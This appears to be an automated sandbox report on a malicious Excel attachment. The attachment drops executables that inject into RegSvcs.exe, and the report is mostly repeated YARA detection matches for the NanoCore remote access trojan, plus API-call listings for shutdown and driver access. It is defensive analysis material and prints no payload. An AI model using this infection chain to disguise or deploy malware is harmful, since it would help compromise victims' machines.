Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 5_2_00FE33A3
Found potential string decryption / allocating functions
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: String function: 00FF59E6 appears 65 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: String function: 00FC6B90 appears 39 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: String function: 00FC14F7 appears 36 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0027E2F0 appears 31 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0027D940 appears 51 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0027D870 appears 35 times
Contains functionality to communicate with device drivers
Source: C:\Users\Public\vbc.exe Code function: 4_2_00266FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 4_2_00266FC6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Import order764536.xlsx Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@16/49@20/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
